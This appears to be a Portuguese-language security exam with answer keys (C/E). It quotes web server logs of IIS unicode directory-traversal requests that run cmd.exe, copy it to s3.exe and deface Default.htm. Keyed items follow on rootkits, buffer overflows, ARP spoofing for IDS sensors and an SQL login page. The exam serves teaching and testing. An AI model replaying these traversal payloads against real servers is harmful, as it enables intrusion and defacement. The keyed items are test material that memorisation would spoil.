"GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:d:\ HTTP/1.0" 502 283atacker4.nowhere.com - - [22/Jan/2001:21:20:08 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+d:\ HTTP/1.0" 200 342atacker4.nowhere.com - - [22/Jan/2001:21:20:25 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+e:\ HTTP/1.0" 200 543atacker5.nowhere.com - - [23/Jan/2001:04:28:41 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 200 607atacker5.nowhere.com - - [23/Jan/2001:04:29:00 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub HTTP/1.1" 200 493atacker5.nowhere.com - - [23/Jan/2001:04:29:06 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot HTTP/1.1" 200 828atacker6.nowhere.com - - [23/Jan/2001:04:30:02 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\s3.exeHTTP/1.0" 502 259atacker6.nowhere.com - - [23/Jan/2001:04:32:29 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\cmd.exeHTTP/1.0" 502 259atacker6.nowhere.com - - [23/Jan/2001:04:33:36 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\s3.exeHTTP/1.0" 502 242atacker6.nowhere.com - - [23/Jan/2001:04:34:11 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87atacker6.nowhere.com - - [23/Jan/2001:04:34:28 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87atacker6.nowhere.com - - [23/Jan/2001:04:35:55 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 404 461atacker6.nowhere.com - - [23/Jan/2001:04:37:34 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215atacker6.nowhere.com - - [23/Jan/2001:04:40:09 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215atacker6.nowhere.com - - [23/Jan/2001:04:40:30 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215atacker4.nowhere.com - - [23/Jan/2001:04:40:51 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880atacker6.nowhere.com - - [23/Jan/2001:04:44:38 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215

36 - Com base no texto CE, julgue os itens abaixo, referentes aos ataques ao servidor http mencionado nesse texto.E 1 As tentativas exploratrias comearam a ter sucesso a partir de 23/1/2001.C 2 Verifica-se ataque de defacement (pichao) a pgina Web.C 3 A vulnerabilidade explorada nos ataques a do parsing das requisies de arquivo em servidores Web, tambm conhecida como ataque de unicode, presente no MS IIS verso 5.0.E 4 Os logs foram gerados pelo MS IIS.E 5 O atacante fez uma cpia de backup da pgina original.37 - Novamente com base no texto CE e acerca dos ataques ao servidor http referido, julgue os itens a seguir.C 1 Nos probes exploratrios, o atacante vasculhou diversos diretrios, procurando o arquivo cmd.exe, que um interpretador de comandos.C 2 Atacker copiou cmd.exe em outro arquivo, que posteriormente foi usado no ataque.E 3 A pgina inicial do servidor Web atacado residia em Default.htm.C 4 O servidor utiliza uma forma elementar de defesa, mantendo a pgina de index em myweb.dll.C 5 Atacker6 teve sucesso no ataque.38 - Ainda com base no texto CE, julgue os itens subseqentes, relativos ao servidor http e aos ataques ocorridos.C 1 A pgina vulnerada se apresentou em branco com os dizeres H4ck3d by Gund3R0th thanks Gund3R1th Grup WebQu33R.E 2 Os ataques no poderiam ser evitados utilizando-se um proxy que restringisse os acessos pgina inicial.E 3 No h patch disponvel, atualmente, para corrigir a vulnerabilidade em questo, que seja fornecido pelo autor/fornecedor do servidor Web.C 4 Um dos elementos dos ataques est no fato de o diretrio system32 ter seu acesso liberado, na configurao default do sistema operacional.E 5 Os ataques poderiam ter sido evitados por meio de filtragem de pacotes em um firewall convencional.39 - O administrador da rede Alfa recebeu diversas reclamaes, de administradores de outras redes, de que uma de suas mquinas estaria gerando trfego suspeito. A mquina em questo um servidor Unix, servidor03 (endereo IP 192.168.11.1). Abaixo, so mostradas as pores relevantes dos resultados da execuo, no referido servidor, de alguns comandos.

Alm das informaes acima, em uma inspeo dos mdulos carregados no kernel, no foi apontada nenhuma anormalidade. Nesse caso, correto concluir que o servidor03 sofreu um comprometimento de root e queC 1 no se trata de um rootkit na forma de um LKM.E 2 um telnet na porta 12345 do servidor03 chamar o programa suspeito, sendo a melhor forma de avaliar o que ele faz.C 3 o programa suspeito executa um unlink antes de se tornar daemon, evitando aparecer no sistema de arquivos.E 4 carregado no boot, acarretando, assim, o comprometimento de algum arquivo de inicializao.C 5 as cadeias de caracteres podem ser inspecionadas, caso a imagem executvel do programa suspeito possa ser localizada no sistema de arquivos /proc.40 - Com relao aos comprometimentos de mquinas originados a partir da explorao de uma sobrecarga de buffer (buffer overflow), julgue os itens abaixo.E 1 A ocorrncia de comprometimento est restrita aos sistemas de cdigo aberto.E 2 O comprometimento independe da linguagem utilizada na implementao do programa especfico que tem seu buffer sobrecarregado.E 3 Pode-se evitar o buffer overflow utilizando-se firewalls na proteo das mquinas.C 4 O buffer overflow consiste em injetar uma cadeia de caracteres longa o suficiente para ocupar totalmente o buffer atacado, seguindo-se uma chamada de sistema que executa o cdigo malicioso.C 5 O buffer overflow genrico utiliza, na sua implementao, o fato de que, na cadeia de caracteres do buffer, s podem ocorrer caracteres distintos do delimitador de cadeias, sendo, ento, normalmente utilizado no preenchimento do buffer o cdigo correspondente ao NOOP do sistema-alvo, facilitando a estimao do endereo de retorno da chamada de sistema.

41 - Um administrador recebeu a tarefa de instalar um sistema de deteco de intruso (IDS) adequado em sua rede. Considerando que a rede utiliza apenas comutadores (switches), correto afirmar que o administrador1 no conseguir executar a tarefa com sucesso, j que, no switch, ao contrrio do hub, cada porta tem um domnio de coliso distinto.2 pode, na implantao do sistema IDS, configurar com sucesso o switch para modo debug, ou equivalente, em que o mesmo passa a operar como hub, sem prejuzo ao desempenho.3 pode, na configurao do sistema IDS, espelhar as portas do switch para a porta de backbone, normalmente usada para uplink/downlink, se houver, no precisando se preocupar com o trfego de todas as portas convergindo para a porta em que est o sensor do IDS.4 pode instalar, na mquina em que rodar o IDS, um mdulo que envie periodicamente pacotes ARP de resposta, contendo o endereo MAC do sensor do IDS e o endereo IP de todas as mquinas que deseja proteger com o IDS, no precisando reconfigurar o switch.5 pode instalar, na mquina em que rodar o IDS, um mdulo que envie periodicamente pacotes ARP de resposta, contendo endereos MAC fictcios para assim preencher totalmente a tabela de endereos fsicos do switch, acarretando, porm, prejuzo ao desempenho.42 - Considere uma pgina Web utilizada por um grupo de usurios para alimentar um banco de dados SQL Server. Os usurios realizam o logon sobre uma conexo SSL e, se autenticados, podem inserir informaes e(ou) realizar consultas no banco de dados, que, aps as inseres, envia como retorno um e-mail de confirmao. O firewall interno s aceita conexes nas portas 443 e 25, nos dois extremos da DMZ. Alguns trechos de cdigo correspondentes a essa pgina e ao script de logon so mostrados a seguir.pgina Web